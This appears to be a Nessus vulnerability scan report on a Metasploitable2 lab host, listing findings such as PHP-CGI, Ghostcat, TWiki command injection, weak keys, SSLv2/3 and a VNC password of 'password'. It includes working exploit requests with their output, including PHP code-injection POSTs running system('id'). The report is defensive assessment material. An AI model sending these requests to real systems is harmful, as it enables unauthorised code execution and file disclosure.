The remote web server contains a version of PHP that allows arbitrary code execution.

The PHP installation on the remote web server contains a flaw that could allow a remote attacker to pass command-line arguments as part of a query string to the PHP-CGI program. This could be abused to execute arbitrary code, reveal PHP source code, cause a system crash, etc.

Upgrade to PHP 5.3.13 / 5.4.3 or later.

High

9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

9.4 (CVSS:3.0/E:H/RL:O/RC:C)

8.9

0.9439

7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)

6.5 (CVSS2#E:H/RL:OF/RC:C)

CANVAS (true) Core Impact (true) Metasploit (true)

Published: 2013/11/01, Modified: 2023/04/25

Nessus was able to verify the issue exists using the following request :

------------------------------ snip ------------------------------
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: metasploitable2.sicurform
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Content-Length: 115
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

<?php echo "Content-Type:text/html\r\n\r\n"; echo 'php_cgi_remote_code_execution-1750326112'; system('id'); die; ?>
------------------------------ snip ------------------------------

There is a vulnerable AJP connector listening on the remote host.

A file read/inclusion vulnerability was found in AJP connector. A remote, unauthenticated attacker could exploit this vulnerability to read web application files from a vulnerable server. In instances where the vulnerable server allows file uploads, an attacker could upload malicious JavaServer Pages (JSP) code within a variety of file types and gain remote code execution (RCE).

Update the AJP configuration to require authorization and/or upgrade the Tomcat server to 7.0.100, 8.5.51, 9.0.31 or later.

High

9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

9.4 (CVSS:3.0/E:H/RL:O/RC:C)

8.9

0.9447

7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)

6.5 (CVSS2#E:H/RL:OF/RC:C)

Published: 2020/03/24, Modified: 2025/02/12

Nessus was able to exploit the issue using the following request :

0x0000: 02 02 00 08 48 54 54 50 2F 31 2E 31 00 00 0F 2F ....HTTP/1.1.../
0x0010: 61 73 64 66 2F 78 78 78 78 78 2E 6A 73 70 00 00 asdf/xxxxx.jsp..
0x0020: 09 6C 6F 63 61 6C 68 6F 73 74 00 FF FF 00 09 6C .localhost.....l
0x0030: 6F 63 61 6C 68 6F 73 74 00 00 50 00 00 09 A0 06 ocalhost..P.....
0x0040: 00 0A 6B 65 65 70 2D 61 6C 69 76 65 00 00 0F 41 ..keep-alive...A
0x0050: 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 00 00 ccept-Language..
0x0060: 0E 65 6E 2D 55 53 2C 65 6E 3B 71 3D 30 2E 35 00 .en-US,en;q=0.5.
0x0070: A0 08 00 01 30 00 00 0F 41 63 63 65 70 74 2D 45 ....0...Accept-E
0x0080: 6E 63 6F 64 69 6E 67 00 00 13 67 7A 69 70 2C 20 ncoding...gzip,
0x0090: 64 65 66 6C 61 74 65 2C 20 73 64 63 68 00 00 0D deflate, sdch...
0x00A0: 43 61 63 68 65 2D 43 6F 6E 74 72 6F 6C 00 00 09 Cache-Control...
0x00B0: 6D 61 78 2D 61 67 65 3D 30 00 A0 0E 00 07 4D 6F max-age=0.....Mo
0x00C0: 7A 69 6C 6C 61 00 00 19 55 70 67 72 61 64 65 2D zilla...Upgrade-
0x00D0: 49 6E 73 65 63 75 72 65 2D 52 65 71 75 65 73 74 Insecure-Request
0x00E0: 73 00 00 01 31 00 A0 01 00 09 74 65 78 74 2F 68 s...1.....text/h
0x00F0: 74 6D 6C 00 A0 0B 00 09 6C 6F 63 61 6C 68 6F 73 tml.....localhos
0x0100: 74 00 0A 00 21 6A 61 76 61 78 2E 73 65 72 76 6C t...!javax.servl
0x0110: 65 74 2E 69 6E 63 6C 75 64 65 2E 72 65 71 75 65 et.include.reque
0x0120: 73 74 5F 75 72 69 00 00 01 31 00 0A 00 1F 6A 61 st_uri...1....ja
0x0130: 76 61 78 2E 73 65 72 76 6C 65 74 2E 69 6E 63 6C vax.servlet.incl
0x0140: 75 64 65 2E 70 61 74 68 5F 69 6E 66 6F 00 00 10 ude.path_info...
0x0150: 2F 57 45 42 2D 49 4E 46 2F 77 65 62 2E 78 6D 6C /WEB-INF/web.xml
0x0160: 00 0A 00 22 6A 61 76 61 78 2E 73 65 72 76 6C 65 ..."javax.servle
0x0170: 74 2E 69 6E 63 6C 75 64 65 2E 73 65 72 76 6C 65 t.include.servle
0x0180: 74 5F 70 61 74 68 00 00 00 00 FF t_path.....



This produced the following truncated output (limited to 10 lines) :
------------------------------ snip ------------------------------
...<?xml version="1.0" encoding="ISO-8859-1"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0
[...]

------------------------------ snip ------------------------------

An unsupported version of Apache Tomcat is installed on the remote host.

According to its version, Apache Tomcat is less than or equal to 5.5.x. It is, therefore, no longer maintained by its vendor or provider.

Lack of support implies that no new security patches for the product will be released by the vendor. As a result, it may contain security vulnerabilities.

Upgrade to a version of Apache Tomcat that is currently supported.

Critical

10.0 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

Published: 2023/02/10, Modified: 2024/05/06

URL : http://metasploitable2.sicurform:8180/
Installed version : 5.5
Security End of Life : September 30, 2012
Time since Security End of Life (Est.) : >= 12 years

An unsupported version of Canonical Ubuntu Linux is installed on the remote host.

According to its version, Canonical Ubuntu Linux is 8.04.x. It is, therefore, no longer maintained by its vendor or provider.

Lack of support implies that no new security patches for the product will be released by the vendor. As a result, it may contain security vulnerabilities.

Upgrade to a version of Canonical Ubuntu Linux that is currently supported.

Critical

10.0 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

Published: 2024/07/03, Modified: 2025/03/26

OS : Ubuntu Linux 8.04
Security End of Life : May 9, 2013
Time since Security End of Life (Est.) : >= 12 years

The remote SSH host keys are weak.

The remote SSH host key has been generated on a Debian or Ubuntu system which contains a bug in the random number generator of its OpenSSL library.

The problem is due to a Debian packager removing nearly all sources of entropy in the remote version of OpenSSL.

An attacker can easily obtain the private part of the remote key and use this to set up decipher the remote session or set up a man in the middle attack.

Consider all cryptographic material generated on the remote host to be guessable. In particuliar, all SSH, SSL and OpenVPN key material should be re-generated.

Critical

5.1

0.0165

10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

8.3 (CVSS2#E:F/RL:OF/RC:C)

Core Impact (true)

Published: 2008/05/14, Modified: 2024/07/24

The remote SSL certificate uses a weak key.

The remote x509 certificate on the remote SSL server has been generated on a Debian or Ubuntu system which contains a bug in the random number generator of its OpenSSL library.

The problem is due to a Debian packager removing nearly all sources of entropy in the remote version of OpenSSL.

An attacker can easily obtain the private part of the remote key and use this to decipher the remote session or set up a man in the middle attack.

Consider all cryptographic material generated on the remote host to be guessable. In particuliar, all SSH, SSL and OpenVPN key material should be re-generated.

Critical

5.1

0.0165

10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

8.3 (CVSS2#E:F/RL:OF/RC:C)

Core Impact (true)

Published: 2008/05/15, Modified: 2020/11/16

The remote SSL certificate uses a weak key.

The remote x509 certificate on the remote SSL server has been generated on a Debian or Ubuntu system which contains a bug in the random number generator of its OpenSSL library.

The problem is due to a Debian packager removing nearly all sources of entropy in the remote version of OpenSSL.

An attacker can easily obtain the private part of the remote key and use this to decipher the remote session or set up a man in the middle attack.

Consider all cryptographic material generated on the remote host to be guessable. In particuliar, all SSH, SSL and OpenVPN key material should be re-generated.

Critical

5.1

0.0165

10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

8.3 (CVSS2#E:F/RL:OF/RC:C)

Core Impact (true)

Published: 2008/05/15, Modified: 2020/11/16

The remote service encrypts traffic using a protocol with known weaknesses.

The remote service accepts connections encrypted using SSL 2.0 and/or SSL 3.0. These versions of SSL are affected by several cryptographic flaws, including:

- An insecure padding scheme with CBC ciphers.

- Insecure session renegotiation and resumption schemes.

An attacker can exploit these flaws to conduct man-in-the-middle attacks or to decrypt communications between the affected service and clients.

Although SSL/TLS has a secure means for choosing the highest supported version of the protocol (so that these versions will be used only if the client or server support nothing better), many web browsers implement this in an unsafe way that allows an attacker to downgrade a connection (such as in POODLE). Therefore, it is recommended that these protocols be disabled entirely.

NIST has determined that SSL 3.0 is no longer acceptable for secure communications. As of the date of enforcement found in PCI DSS v3.1, any version of SSL will not meet the PCI SSC's definition of 'strong cryptography'.

Consult the application's documentation to disable SSL 2.0 and 3.0.
Use TLS 1.2 (with approved cipher suites) or higher instead.

Critical

9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

Published: 2005/10/12, Modified: 2022/04/04

- SSLv2 is enabled and the server supports at least one cipher.

Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-RC2-CBC-MD5 RSA(512) RSA RC2-CBC(40) MD5 export
EXP-RC4-MD5 RSA(512) RSA RC4(40) MD5 export

Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DES-CBC3-MD5 RSA RSA 3DES-CBC(168) MD5

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
RC4-MD5 RSA RSA RC4(128) MD5

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

- SSLv3 is enabled and the server supports at least one cipher.
Explanation: TLS 1.0 and SSL 3.0 cipher suites may be used with SSLv3


Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-EDH-RSA-DES-CBC-SHA DH(512) RSA DES-CBC(40) SHA1 export
EDH-RSA-DES-CBC-SHA DH RSA DES-CBC(56) SHA1
EXP-ADH-DES-CBC-SHA DH(512) None DES-CBC(40) SHA1 export
EXP-ADH-RC4-MD5 DH(512) None RC4(40) MD5 export
ADH-DES-CBC-SHA DH None DES-CBC(56) SHA1
EXP-DES-CBC-SHA RSA(512) RSA DES-CBC(40) SHA1 export
EXP-RC2-CBC-MD5 RSA(512) RSA RC2-CBC(40) MD5 export
EXP-RC4-MD5 RSA(512) RSA RC4(40) MD5 export
DES-CBC-SHA RSA RSA DES-CBC(56) SHA1

Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EDH-RSA-DES-CBC3-SHA DH RSA 3DES-CBC(168) SHA1
ADH-DES-CBC3-SHA DH None 3DES-CBC(168) SHA1
DES-CBC3-SHA RSA RSA 3DES-CBC(168) SHA1

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DHE-RSA-AES128-SHA DH RSA AES-CBC(128) SHA1
DHE-RSA-AES256-SHA DH RSA AES-CBC(256) SHA1
ADH-AES128-SHA DH None AES-CBC(128) SHA1
ADH-AES256-SHA DH None AES-CBC(256) SHA1
ADH-RC4-MD5 DH None RC4(128) MD5
AES128-SHA RSA RSA AES-CBC(128) SHA1
AES256-SHA RSA RSA AES-CBC(256) SHA1
RC4-MD5 RSA RSA RC4(128) MD5
RC4-SHA RSA RSA RC4(128) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

The remote service encrypts traffic using a protocol with known weaknesses.

The remote service accepts connections encrypted using SSL 2.0 and/or SSL 3.0. These versions of SSL are affected by several cryptographic flaws, including:

- An insecure padding scheme with CBC ciphers.

- Insecure session renegotiation and resumption schemes.

An attacker can exploit these flaws to conduct man-in-the-middle attacks or to decrypt communications between the affected service and clients.

Although SSL/TLS has a secure means for choosing the highest supported version of the protocol (so that these versions will be used only if the client or server support nothing better), many web browsers implement this in an unsafe way that allows an attacker to downgrade a connection (such as in POODLE). Therefore, it is recommended that these protocols be disabled entirely.

NIST has determined that SSL 3.0 is no longer acceptable for secure communications. As of the date of enforcement found in PCI DSS v3.1, any version of SSL will not meet the PCI SSC's definition of 'strong cryptography'.

Consult the application's documentation to disable SSL 2.0 and 3.0.
Use TLS 1.2 (with approved cipher suites) or higher instead.

Critical

9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

Published: 2005/10/12, Modified: 2022/04/04

- SSLv3 is enabled and the server supports at least one cipher.
Explanation: TLS 1.0 and SSL 3.0 cipher suites may be used with SSLv3


Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EDH-RSA-DES-CBC3-SHA DH RSA 3DES-CBC(168) SHA1
DES-CBC3-SHA RSA RSA 3DES-CBC(168) SHA1

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DHE-RSA-AES128-SHA DH RSA AES-CBC(128) SHA1
DHE-RSA-AES256-SHA DH RSA AES-CBC(256) SHA1
AES128-SHA RSA RSA AES-CBC(128) SHA1
AES256-SHA RSA RSA AES-CBC(256) SHA1
RC4-SHA RSA RSA RC4(128) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

The remote IRC server contains a backdoor.

The remote IRC server is a version of UnrealIRCd with a backdoor that allows an attacker to execute arbitrary code on the affected host.

Re-download the software, verify it using the published MD5 / SHA1 checksums, and re-install it.

Critical

7.4

0.7216

10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

8.3 (CVSS2#E:F/RL:OF/RC:C)

CANVAS (true) Metasploit (true)

Published: 2010/06/14, Modified: 2022/04/11

The remote IRC server is running as :

uid=0(root) gid=0(root) groups=0(root)

A VNC server running on the remote host is secured with a weak password.

The VNC server running on the remote host is secured with a weak password. Nessus was able to login using VNC authentication and a password of 'password'. A remote, unauthenticated attacker could exploit this to take control of the system.

Secure the VNC service with a strong password.

Critical

10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

Published: 2012/08/29, Modified: 2015/09/24

Nessus logged in using a password of "password".

The remote web server hosts a PHP application that is affected by SQLi vulnerability.

According to its self-reported version number, the phpMyAdmin application hosted on the remote web server is prior to 4.8.6. It is, therefore, affected by a SQL injection (SQLi) vulnerability that exists in designer feature of phpMyAdmin. An unauthenticated, remote attacker can exploit this to inject or manipulate SQL queries in the back-end database, resulting in the disclosure or manipulation of arbitrary data.

Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.

Upgrade to phpMyAdmin version 4.8.6 or later.
Alternatively, apply the patches referenced in the vendor advisories.

High

9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

8.5 (CVSS:3.0/E:U/RL:O/RC:C)

5.9

0.0172

7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)

5.5 (CVSS2#E:U/RL:OF/RC:C)

Published: 2019/06/13, Modified: 2024/11/22

URL : http://metasploitable2.sicurform/phpMyAdmin
Installed version : 3.1.1
Fixed version : 4.8.6

The remote web server contains a version of PHP that allows arbitrary code execution.

The PHP installation on the remote web server contains a flaw that could allow a remote attacker to pass command-line arguments as part of a query string to the PHP-CGI program. This could be abused to execute arbitrary code, reveal PHP source code, cause a system crash, etc.

If using Lotus Foundations, upgrade the Lotus Foundations operating system to version 1.2.2b or later.

Otherwise, upgrade to PHP 5.3.13 / 5.4.3 or later.

High

8.9

0.9439

7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)

6.5 (CVSS2#E:H/RL:OF/RC:C)

CANVAS (true) Core Impact (true) Metasploit (true)

Published: 2012/05/14, Modified: 2022/03/28

Nessus was able to verify the issue exists using the following request :

------------------------------ snip ------------------------------
POST /dvwa/dvwa/includes/DBMS/DBMS.php?-d+allow_url_include%3don+-d+safe_mode%3doff+-d+suhosin.simulation%3don+-d+open_basedir%3doff+-d+auto_prepend_file%3dphp%3a//input+-n HTTP/1.1
Host: metasploitable2.sicurform
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Content-Length: 82
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

<?php echo 'php_cgi_query_string_code_execution-1750326112'; system('id'); die; ?>
------------------------------ snip ------------------------------

The remote service supports the use of medium strength SSL ciphers.

The remote host supports the use of SSL ciphers that offer medium strength encryption. Nessus regards medium strength as any encryption that uses key lengths at least 64 bits and less than 112 bits, or else that uses the 3DES encryption suite.

Note that it is considerably easier to circumvent medium strength encryption if the attacker is on the same physical network.

Reconfigure the affected application if possible to avoid use of medium strength ciphers.

Medium

7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

6.1

0.406

5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)

Published: 2009/11/23, Modified: 2025/02/12

Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DES-CBC3-MD5 0x07, 0x00, 0xC0 RSA RSA 3DES-CBC(168) MD5
EDH-RSA-DES-CBC3-SHA 0x00, 0x16 DH RSA 3DES-CBC(168) SHA1
ADH-DES-CBC3-SHA 0x00, 0x1B DH None 3DES-CBC(168) SHA1
DES-CBC3-SHA 0x00, 0x0A RSA RSA 3DES-CBC(168) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

The remote service supports the use of medium strength SSL ciphers.

The remote host supports the use of SSL ciphers that offer medium strength encryption. Nessus regards medium strength as any encryption that uses key lengths at least 64 bits and less than 112 bits, or else that uses the 3DES encryption suite.

Note that it is considerably easier to circumvent medium strength encryption if the attacker is on the same physical network.

Reconfigure the affected application if possible to avoid use of medium strength ciphers.

Medium

7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

6.1

0.406

5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)

Published: 2009/11/23, Modified: 2025/02/12

Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EDH-RSA-DES-CBC3-SHA 0x00, 0x16 DH RSA 3DES-CBC(168) SHA1
DES-CBC3-SHA 0x00, 0x0A RSA RSA 3DES-CBC(168) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

An SMB server running on the remote host is affected by the Badlock vulnerability.

The version of Samba, a CIFS/SMB server for Linux and Unix, running on the remote host is affected by a flaw, known as Badlock, that exists in the Security Account Manager (SAM) and Local Security Authority (Domain Policy) (LSAD) protocols due to improper authentication level negotiation over Remote Procedure Call (RPC) channels. A man-in-the-middle attacker who is able to able to intercept the traffic between a client and a server hosting a SAM database can exploit this flaw to force a downgrade of the authentication level, which allows the execution of arbitrary Samba network calls in the context of the intercepted user, such as viewing or modifying sensitive security data in the Active Directory (AD) database or disabling critical services.

Upgrade to Samba version 4.2.11 / 4.3.8 / 4.4.2 or later.

Medium

7.5 (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)

6.5 (CVSS:3.0/E:U/RL:O/RC:C)

5.9

0.7992

6.8 (CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P)

5.0 (CVSS2#E:U/RL:OF/RC:C)

Published: 2016/04/13, Modified: 2019/11/20

Nessus detected that the Samba Badlock patch has not been applied.

The remote web server hosts a CGI application that is affected by an arbitrary command execution vulnerability.

The version of TWiki running on the remote host allows an attacker to manipulate input to the 'rev' parameter in order to execute arbitrary shell commands on the remote host subject to the privileges of the web server user id.

Apply the appropriate hotfix referenced in the vendor advisory.

High

8.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

8.2 (CVSS:3.0/E:F/RL:O/RC:C)

7.4

0.8167

7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)

6.2 (CVSS2#E:F/RL:OF/RC:C)

Metasploit (true)

Published: 2005/09/15, Modified: 2025/05/14

Nessus was able to execute the command "id" using the
following request :

http://metasploitable2.sicurform/twiki/bin/view/Main/TWikiUsers?rev=2%20%7cid%7c%7cecho%20


This produced the following truncated output (limited to 2 lines) :
------------------------------ snip ------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)

------------------------------ snip ------------------------------

The remote web server contains a PHP application that is affected by a code execution vulnerability.

The setup script included with the version of phpMyAdmin installed on the remote host does not properly sanitize user-supplied input before using it to generate a config file for the application. This version is affected by the following vulnerabilities :

- The setup script inserts the unsanitized verbose server name into a C-style comment during config file generation.

- An attacker can save arbitrary data to the generated config file by altering the value of the 'textconfig' parameter during a POST request to config.php.

An unauthenticated, remote attacker can exploit these issues to execute arbitrary PHP code.

Upgrade to phpMyAdmin 3.1.3.2. Alternatively, apply the patches referenced in the project's advisory.

High

6.7

0.0116

7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)

5.5 (CVSS2#E:U/RL:OF/RC:C)

Published: 2009/04/16, Modified: 2022/04/11

The rlogin service is running on the remote host.

The rlogin service is running on the remote host. This service is vulnerable since data is passed between the rlogin client and server in cleartext. A man-in-the-middle attacker can exploit this to sniff logins and passwords. Also, it may allow poorly authenticated logins without passwords. If the host is vulnerable to TCP sequence number guessing (from any network) or IP spoofing (including ARP hijacking on a local network) then it may be possible to bypass authentication.
Finally, rlogin is an easy way to turn file-write access into full logins through the .rhosts or rhosts.equiv files.

Comment out the 'login' line in /etc/inetd.conf and restart the inetd process. Alternatively, disable this service and use SSH instead.

High

6.7

0.4664

7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)

Metasploit (true)

Published: 1999/08/30, Modified: 2022/04/11

The rsh service is running on the remote host.

The rsh service is running on the remote host. This service is vulnerable since data is passed between the rsh client and server in cleartext. A man-in-the-middle attacker can exploit this to sniff logins and passwords. Also, it may allow poorly authenticated logins without passwords. If the host is vulnerable to TCP sequence number guessing (from any network) or IP spoofing (including ARP hijacking on a local network) then it may be possible to bypass authentication.
Finally, rsh is an easy way to turn file-write access into full logins through the .rhosts or rhosts.equiv files.

Comment out the 'rsh' line in /etc/inetd.conf and restart the inetd process. Alternatively, disable this service and use SSH instead.

High

6.7

0.4664

7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)

Metasploit (true)

Published: 1999/08/22, Modified: 2022/04/11

The remote web server contains default files.

The default error page, default index page, example JSPs and/or example servlets are installed on the remote Apache Tomcat server. These files should be removed as they may help an attacker uncover information about the remote Tomcat install or host itself.

Delete the default index page and remove the example JSP and servlets. Follow the Tomcat or OWASP instructions to replace or modify the default error page.

Medium

5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)

Published: 2004/03/02, Modified: 2024/09/03

The following default files were found :

http://metasploitable2.sicurform:8180/tomcat-docs/index.html

The server is not configured to return a custom page in the event of a client requesting a non-existent resource.
This may result in a potential disclosure of sensitive information about the server to attackers.

It is possible to retrieve file backups from the remote web server.

By appending various suffixes (ie: .old, .bak, ~, etc...) to the names of various files on the remote host, it seems possible to retrieve their contents, which may result in disclosure of sensitive information.

Ensure the files do not contain any sensitive information, such as credentials to connect to a database, and delete or protect those files that should not be accessible.

Medium

5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)

Published: 2003/03/17, Modified: 2023/07/10

It is possible to read the following backup files :

- File : /twiki/bin/view/Main/WebHome~
URL : http://metasploitable2.sicurform/twiki/bin/view/Main/WebHome~

- File : /twiki/bin/search/Main/SearchResult~
URL : http://metasploitable2.sicurform/twiki/bin/search/Main/SearchResult~

Some directories on the remote web server are browsable.

Multiple Nessus plugins identified directories on the web server that are browsable.

Make sure that browsable directories do not leak confidential information or give access to sensitive resources. Additionally, use access restrictions or disable directory indexing for any that do.

Medium

5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)

Published: 2009/09/15, Modified: 2021/01/19

The following directories are browsable :

http://metasploitable2.sicurform/dav/
http://metasploitable2.sicurform/dvwa/dvwa/
http://metasploitable2.sicurform/dvwa/dvwa/css/
http://metasploitable2.sicurform/dvwa/dvwa/images/
http://metasploitable2.sicurform/dvwa/dvwa/includes/
http://metasploitable2.sicurform/dvwa/dvwa/includes/DBMS/
http://metasploitable2.sicurform/dvwa/dvwa/js/
http://metasploitable2.sicurform/mutillidae/documentation/
http://metasploitable2.sicurform/mutillidae/styles/
http://metasploitable2.sicurform/mutillidae/styles/ddsmoothmenu/
http://metasploitable2.sicurform/test/
http://metasploitable2.sicurform/test/testoutput/

Debugging functions are enabled on the remote web server.

The remote web server supports the TRACE and/or TRACK methods. TRACE and TRACK are HTTP methods that are used to debug web server connections.

Disable these HTTP methods. Refer to the plugin output for more information.

Medium

5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

4.6 (CVSS:3.0/E:U/RL:O/RC:C)

4.0

0.8269

5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)

3.7 (CVSS2#E:U/RL:OF/RC:C)

Published: 2003/01/23, Modified: 2024/04/09

To disable these methods, add the following lines for each virtual
host in your configuration file :

RewriteEngine on
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]

Alternatively, note that Apache versions 1.3.34, 2.0.55, and 2.2
support disabling the TRACE method natively via the 'TraceEnable'
directive.

Nessus sent the following TRACE request : \n\n------------------------------ snip ------------------------------\nTRACE /Nessus1538077030.html HTTP/1.1
Connection: Close
Host: metasploitable2.sicurform
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

------------------------------ snip ------------------------------\n\nand received the following response from the remote server :\n\n------------------------------ snip ------------------------------\nHTTP/1.1 200 OK
Date: Thu, 19 Jun 2025 09:37:54 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: message/http


TRACE /Nessus1538077030.html HTTP/1.1
Connection: Keep-Alive
Host: metasploitable2.sicurform
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

------------------------------ snip ------------------------------\n

The remote host has IP forwarding enabled.

The remote host has IP forwarding enabled. An attacker can exploit this to route packets through the host and potentially bypass some firewalls / routers / NAC filtering.

Unless the remote host is a router, it is recommended that you disable IP forwarding.

On Linux, you can disable IP forwarding by doing :

echo 0 > /proc/sys/net/ipv4/ip_forward

On Windows, set the key 'IPEnableRouter' to 0 under

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters

On Mac OS X, you can disable IP forwarding by executing the command :

sysctl -w net.inet.ip.forwarding=0

For other systems, check with your vendor.

Medium

